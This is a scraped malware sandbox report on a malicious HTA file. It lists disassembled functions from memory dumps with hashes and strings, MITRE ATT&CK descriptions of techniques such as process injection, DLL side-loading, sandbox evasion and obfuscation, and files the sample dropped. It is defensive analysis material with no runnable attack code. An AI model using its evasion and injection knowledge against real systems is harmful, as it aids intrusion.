Instruction ID: 42a754ce9decae5a4962d885b60227b9e15b3ed41622d3705ba53bfa8a993043
Opcode Fuzzy Hash: 04db9338f16a824204afea5d53ddcb03a573749dd34a7187629ba9c740e8c10e
Instruction Fuzzy Hash: C190027120240152964072989804A4E411587E1342B95D52AA4015554DCD1889626221

Function 00F52D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de63df77e4f8c694952523ebed480ed89c8b7b66e3e185cb86f6209b89d7b882
Instruction ID: 4522436f10b4b2085a9874b7a81e1d4a446921903ae4378c2972f7a2d12bfa72
Opcode Fuzzy Hash: de63df77e4f8c694952523ebed480ed89c8b7b66e3e185cb86f6209b89d7b882
Instruction Fuzzy Hash: 3990026120544452D20075989408A06001587D0345F55D126A5064595ECA398952B131

Function 00F52EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa977f2dff10f2bb3113819995f23ba37d4f391bd43362253b1b9df9b310d172
Instruction ID: 33e16f912cc44f9595f799e2b322fc5d6c932cc24bf8ae728f2dba2727bf31ab
Opcode Fuzzy Hash: fa977f2dff10f2bb3113819995f23ba37d4f391bd43362253b1b9df9b310d172
Instruction Fuzzy Hash: 4C9002A120180413D24075988804607001587D0342F55C126A6064555F8E2D8D527135

Function 00F52EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3f80a170fa33676104da5251653631c441e6dbe93911c56fea409ff78f44f2
Instruction ID: f12711259936484f0daccf3473f8fcdddfc807442bd14d11000adac166bab681
Opcode Fuzzy Hash: 4d3f80a170fa33676104da5251653631c441e6dbe93911c56fea409ff78f44f2
Instruction Fuzzy Hash: C79002B120140412D24071988404746001587D0341F55C126A9064554F8A5D8ED67665

Function 00F52E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f237a04a253c52f5774e425ed5c4a9a3bd85bc40525db4baf5d751058993f3
Instruction ID: 8913aafa86ac4498b571d41e432d56bba96f34e77eed986383c82be0572aad24
Opcode Fuzzy Hash: c2f237a04a253c52f5774e425ed5c4a9a3bd85bc40525db4baf5d751058993f3
Instruction Fuzzy Hash: 9F90026160140512D20171988404616001A87D0381F95C137A5024555FCE298A93B131

Function 00F52E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac579617d185f8ecf16dbee17f5f916805b661e31ae7fd49f8316827a638cb39
Instruction ID: 18949c54ea9070afa5c36eeef129710cb7358bb33f417d3c43b2876563dfea3e
Opcode Fuzzy Hash: ac579617d185f8ecf16dbee17f5f916805b661e31ae7fd49f8316827a638cb39
Instruction Fuzzy Hash: 8490026130140412D202719884146060019C7D1385F95C127E5424555E8A298A53B132

Function 00F52FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70e8a26c96493da0fafecc1478378fd2306d6603600b71d7c80e8b126aec03f
Instruction ID: 870b2c1a82adc933b8caf83f28402f4ffb162fae7f8e9f40cf2ab7cfd4225120
Opcode Fuzzy Hash: d70e8a26c96493da0fafecc1478378fd2306d6603600b71d7c80e8b126aec03f
Instruction Fuzzy Hash: 40900261211C0052D30075A88C14B07001587D0343F55C22AA4154554DCD1989626521

Function 00F52FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e15b46180b26b97fe7cacca65b3a8dd9ac8d17d5a8ce430442f4f4dc45fccbc
Instruction ID: f4418eedecb81a5a51b804dcd418db99daf9dc7c88f46eb9d7078e8c74366d91
Opcode Fuzzy Hash: 9e15b46180b26b97fe7cacca65b3a8dd9ac8d17d5a8ce430442f4f4dc45fccbc
Instruction Fuzzy Hash: 2A90026160140052424071A8C8449064015ABE1351755C236A4998550E895D89666665

Function 00F52FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9971dbf5191ef45bea94a6245cdfed3f95a1c213ea2ae9d96d3aa2e574eb39f5
Instruction ID: d2249f65607ef7c7c76c5bbfb8114f296ff8da3ad9f6dbb4c04104958b5e460b
Opcode Fuzzy Hash: 9971dbf5191ef45bea94a6245cdfed3f95a1c213ea2ae9d96d3aa2e574eb39f5
Instruction Fuzzy Hash: 4A90027120180412D20071988808747001587D0342F55C126A9164555F8A69C9927531

Function 00F52F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c54d59961008f6818c1e25181e075327092e3e7c0b76dd3dd66ca5c40d73f4e
Instruction ID: 22fd054d09c57452b69dbc1b5f82a9b9ab0a9237112579b8638d2745057811fa
Opcode Fuzzy Hash: 0c54d59961008f6818c1e25181e075327092e3e7c0b76dd3dd66ca5c40d73f4e
Instruction Fuzzy Hash: B090027120180412D2007198881470B001587D0342F55C126A5164555E8A2989527571

Function 00F52F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd97f8e76096826967e34a08938cca2c83d827c79f1672e954bd72deb1c1270
Instruction ID: 7245c93e9fa5effb2a8a466e31e0ed6b5b68265e70d0b062202e89261c6a058a
Opcode Fuzzy Hash: 7bd97f8e76096826967e34a08938cca2c83d827c79f1672e954bd72deb1c1270
Instruction Fuzzy Hash: C29002A121140052D20471988404706005587E1341F55C127A6154554DC92D8D626125

Function 00F52F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf6e7630c161f9f9ee459620e61234deae80381663e896e15bb6c484f547621
Instruction ID: b8b4b19b6491270ef57d6c89d70cf4089f26eb28bcab03e6606740b83888ace0
Opcode Fuzzy Hash: 4cf6e7630c161f9f9ee459620e61234deae80381663e896e15bb6c484f547621
Instruction Fuzzy Hash: 1D9002A134140452D20071988414B060015C7E1341F55C12AE5064554E8A1DCD537126

Function 00F52C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 466b9410c0470fbee2d975417a53124cd435a2f22cf57b08feee37d969a35c3e
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 00F52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F5293C
___swprintf_l.LIBCMT ref: 00F5295E
___swprintf_l.LIBCMT ref: 00F529A3
___swprintf_l.LIBCMT ref: 00F8A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 00F8A54E
ffff:, xrefs: 00F8A504
::%hs%u.%u.%u.%u, xrefs: 00F8A527
:%u.%u.%u.%u, xrefs: 00F8A5B8

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c5dc91bef789f4d64639255eeb3e95c4ff01b0fcaac4b3658e420dd85c21a4d1
Instruction ID: 0fff865466d3e5ff728095a0fd576a10c1eae8288f462d535887fc63008c3f62
Opcode Fuzzy Hash: c5dc91bef789f4d64639255eeb3e95c4ff01b0fcaac4b3658e420dd85c21a4d1
Instruction Fuzzy Hash: BB51F9B2E04156BFDB50DB988C80A7EF7B8FB09302B14822AE965D7641D734DE44B7E0

Function 00F47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00F846FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00F84742
Execute=1, xrefs: 00F84713
CLIENT(ntdll): Processing section info %ws..., xrefs: 00F84787
ExecuteOptions, xrefs: 00F846A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00F84655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00F84725

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 19a2192a3bf4848ac7aeff797f50f25be901edb0c889e66c3776901defd67ac8
Instruction ID: 3265886a34b3dd87dce0c13af46dde8eb7885847ec9b4d60b9938cfd7746401e
Opcode Fuzzy Hash: 19a2192a3bf4848ac7aeff797f50f25be901edb0c889e66c3776901defd67ac8
Instruction Fuzzy Hash: 35510831A0431DAADF20BBA4DC86FED7BB9EF04310F5500A9EE05A7181E775AE45AF50

Function 00F5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00F5B6BF

Strings

0, xrefs: 00F5B695
-, xrefs: 00F5B650
0, xrefs: 00F5B66F
+, xrefs: 00F5B65A

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 09caec135cc734eb8385aae8afd7c23ee391455aaf822c8d1e49da2d9d2d2b00
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: CB81D630E052499EDF24CF68C8917FEBBB5AF85322F184159EE61A72D1C7349C49E750

Function 00F4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00F87B7F
RTL: Resource at %p, xrefs: 00F87B8E
RTL: Re-Waiting, xrefs: 00F87BAC

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ca660e7c2f85c988b2f3d8bf675c8a7c1366136c975357695f0e2d241836bbd1
Instruction ID: 1b405ce0f2e96b49bf42eebfb22ea7541939389c3ac16320171b46364331e3b2
Opcode Fuzzy Hash: ca660e7c2f85c988b2f3d8bf675c8a7c1366136c975357695f0e2d241836bbd1
Instruction Fuzzy Hash: AE41E5317047029FD720DE25CD41B6ABBE5EF84721F100A1DF95ADB282DB31E809AB91

Function 00F4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F8728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00F87294
RTL: Resource at %p, xrefs: 00F872A3
RTL: Re-Waiting, xrefs: 00F872C1

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 475f83a06bdfadfa3ab26f5b03049e87201aea82e2844f0a804be91c16fb02ee
Instruction ID: 88046438310ca1cf25f9268fc979180cda29a801fee360c2481406f0796bf231
Opcode Fuzzy Hash: 475f83a06bdfadfa3ab26f5b03049e87201aea82e2844f0a804be91c16fb02ee
Instruction Fuzzy Hash: E9412532B04316ABD710EE25CC41B66B7A5FB44720F200619FD55E7282DB30E846EBD0

Function 00F57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00F57E8B

Strings

+, xrefs: 00F57DE8
-, xrefs: 00F57DDD

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 503d8fa5886a3edfc8419b14027d105b88cb4db33074c783ab0f2fe2a05be5a2
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A291D571E083069BDF24EE69E8816BEB7F1AF44332F24451AEE55E72C0D7348D49A790

Function 00F19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 00F19175
$, xrefs: 00F19191

Memory Dump Source

Source File: 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ee0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 27b9946ee94140770e71040cf0b3878ee00c149b9f92db29f8d4bafb506b38c4
Instruction ID: a9d8196ae1f83f328bc940eb7472c89f72078a046ccb2ae4aee20e0b2835cac2
Opcode Fuzzy Hash: 27b9946ee94140770e71040cf0b3878ee00c149b9f92db29f8d4bafb506b38c4
Instruction Fuzzy Hash: 4F812972D002699BDB35CB54CC45BEAB7B8AB08710F0481EAE90DB7280D7759E84DFA1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report createdbetterthingswithgreatnressgivenmebackwithnice.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\createdbestthingswithenergylevelgoodforbusinesspuropse[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RESD327.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01hknfet.vve.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_es0xwlcn.ybs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2w0ygoe.pna.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jp2ojsae.ove.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le5ooktt.mpt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmoy3krf.004.psm1

C:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP

Windows Analysis Report
